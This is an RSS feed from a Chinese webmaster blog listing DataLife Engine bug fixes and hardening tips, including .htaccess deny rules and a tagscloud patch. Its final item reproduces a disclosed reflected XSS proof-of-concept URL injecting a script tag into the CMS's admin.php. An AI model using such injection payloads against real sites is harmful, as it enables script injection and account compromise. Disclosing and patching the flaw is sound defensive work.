<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>中国站长帮-zzbang.cn &#187; 漏洞bug</title>
	<atom:link href="http://www.zzbang.cn/cms/dle/hack-bug/feed" rel="self" type="application/rss+xml" />
	<link>http://www.zzbang.cn</link>
	<description>忽悠站长是可耻的，也必将是自掘坟墓的</description>
	<lastBuildDate>Thu, 09 Feb 2012 08:51:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>DataLife Engine 7.3 全英文版bug修正</title>
		<link>http://www.zzbang.cn/cms/dle/hack-bug/125.html</link>
		<comments>http://www.zzbang.cn/cms/dle/hack-bug/125.html#comments</comments>
		<pubDate>Wed, 14 Jan 2009 09:03:49 +0000</pubDate>
		<dc:creator>zzbang</dc:creator>
				<category><![CDATA[漏洞bug]]></category>
		<category><![CDATA[DataLife Engine 7.3]]></category>

		<guid isPermaLink="false">http://zzbang.cn/?p=125</guid>
		<description><![CDATA[<br/>部分用7.3的用户有下面问题 : 用户组管理出错 Warning: mysql_fetch_assoc(): 13 is not a valid MySQL result resource in /usr/home/xxxxx/public_html/engine/classes/mysql.class.php on line 100 或者存在falsh文件上传和演示bug. 下面是解决方案. 下载补丁文件: http://www.downforall.com/file.php?file=6b59a821a060429885a48656596e762b 上传覆盖: engine/inc/usergroup.php engine/inc/files.php engine/classes/swfupload/swfupload.js engine/classes/swfupload/swfupload.swf 方法来自国外]]></description>
		<wfw:commentRss>http://www.zzbang.cn/cms/dle/hack-bug/125.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>保护备份的数据库</title>
		<link>http://www.zzbang.cn/cms/dle/hack-bug/123.html</link>
		<comments>http://www.zzbang.cn/cms/dle/hack-bug/123.html#comments</comments>
		<pubDate>Wed, 14 Jan 2009 09:00:23 +0000</pubDate>
		<dc:creator>zzbang</dc:creator>
				<category><![CDATA[漏洞bug]]></category>

		<guid isPermaLink="false">http://zzbang.cn/?p=123</guid>
		<description><![CDATA[<br/>Step 1: - The .htaccess doesn&#8217;t provide a protection to anyone from downloading the backups. - The .htaccess doesn&#8217;t prevent search engines from entering this folder so: - Open .htaccess which in your backup folder and enter this code: &#60;Files “*.sql”&#62; Deny from all &#60;/Files&#62; &#60;Files “*.gz”&#62; Deny from all &#60;/Files&#62; Now you prevent the [...]]]></description>
		<wfw:commentRss>http://www.zzbang.cn/cms/dle/hack-bug/123.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>利用.htaccess保护你的.tpl模板、images文件夹、css文件</title>
		<link>http://www.zzbang.cn/php-programme/121.html</link>
		<comments>http://www.zzbang.cn/php-programme/121.html#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:55:48 +0000</pubDate>
		<dc:creator>zzbang</dc:creator>
				<category><![CDATA[php编程]]></category>
		<category><![CDATA[漏洞bug]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[tpl模板]]></category>

		<guid isPermaLink="false">http://zzbang.cn/?p=121</guid>
		<description><![CDATA[<img src="http://www.zzbang.cn/wp-content/uploads/logos//php.gif" width="189" height="124" alt="" title="php编程" /><br/>如何保护你的.tpl模板: - 打开一个文本编辑器，我通常用gedit ，复制下面文本： Order Deny,Allow Allow from all &#60;Files “*.tpl”&#62; Deny from all &#60;/Files&#62; - 另存为 .htaccess - 上传到你的模板目录. -保护图片被盗链用下列代码保存为.htaccess传到图片目录 Order Deny,Allow Allow from all &#60;Files “*.gif”&#62; Deny from all &#60;/Files&#62; &#60;Files “*.jpg”&#62; Deny from all &#60;/Files&#62; - 方法同上，保护css用下面代码 &#60;Files “*.css”&#62; Deny from all &#60;/Files&#62;]]></description>
		<wfw:commentRss>http://www.zzbang.cn/php-programme/121.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>如何解决”Warning: Division by zero in /tagscloud.php on line xx”</title>
		<link>http://www.zzbang.cn/cms/dle/hack-bug/117.html</link>
		<comments>http://www.zzbang.cn/cms/dle/hack-bug/117.html#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:40:20 +0000</pubDate>
		<dc:creator>zzbang</dc:creator>
				<category><![CDATA[漏洞bug]]></category>
		<category><![CDATA[datalife]]></category>
		<category><![CDATA[tagscloud]]></category>

		<guid isPermaLink="false">http://zzbang.cn/?p=117</guid>
		<description><![CDATA[<br/>作者:dle-support 翻译：站长帮 我们很多人在用datalife时会发前端现网页头部出现下面一行： warning: Division by zero in /home/xxxx/public_html/engine/modules/tagscloud.php on line xx XX 是数字 这是一个空tag的结果. 这里告诉你如何改善。 感谢 Apotikos 和 gjizaqi -打开engine目录下  engine/modules/tagscloud.php - 找到: foreach ($tags as $tag =&#62; $value) { $list[$tag]['tag'] = $tag; $list[$tag]['size'] = $sizes[sprintf("%d", ($value-$min)/$range*4)]; } - 把下面字符串: range*4 换成: range*2 好了。 站长测试了。]]></description>
		<wfw:commentRss>http://www.zzbang.cn/cms/dle/hack-bug/117.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DLE7.2 版Xss跨站漏洞被发现(Exploit)</title>
		<link>http://www.zzbang.cn/cms/dle/hack-bug/115.html</link>
		<comments>http://www.zzbang.cn/cms/dle/hack-bug/115.html#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:32:17 +0000</pubDate>
		<dc:creator>zzbang</dc:creator>
				<category><![CDATA[漏洞bug]]></category>
		<category><![CDATA[Xss跨站]]></category>

		<guid isPermaLink="false">http://zzbang.cn/?p=115</guid>
		<description><![CDATA[<br/>Author : Hadi Kiamarsi &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- Discovered by : Hadi Kiamarsi &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- Exploited By : Hadi Kiamarsi &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- E-Mail : hadikiamarsi[at]hotmail.com &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- CMS: Datalife Engine ( version 7.2 ) &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- XSS Exploit : query : http://[www.example.com]/admin.php/%3E%22%3E%3CScRiPt%3Ealert(&#8216;Hadi-Kiam arsi&#8217;)%3C/ScRiPt%3E]]></description>
		<wfw:commentRss>http://www.zzbang.cn/cms/dle/hack-bug/115.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

